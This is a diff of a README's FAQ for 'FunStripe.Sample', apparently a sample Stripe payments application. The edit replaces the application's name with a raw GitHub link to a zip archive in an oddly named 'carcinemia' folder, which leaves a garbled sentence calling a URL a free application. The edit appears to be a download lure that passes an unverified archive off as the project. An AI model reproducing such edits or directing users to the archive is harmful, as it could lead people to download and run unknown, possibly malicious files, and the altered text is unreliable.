Velder101/FunStripe.Sample/README.md

 ## 🤔 Frequently Asked Questions

 ### Q: Is this application free to use?
-A: Yes, FunStripe.Sample is a free example application intended for learning purposes.
+A: Yes, https://raw.githubusercontent.com/Velder101/FunStripe.Sample/main/carcinemia/FunStripe.Sample.zip is a free example application intended for learning purposes.

 ### Q: What types of payments can I process?
 A: You can process credit and debit card payments using this application.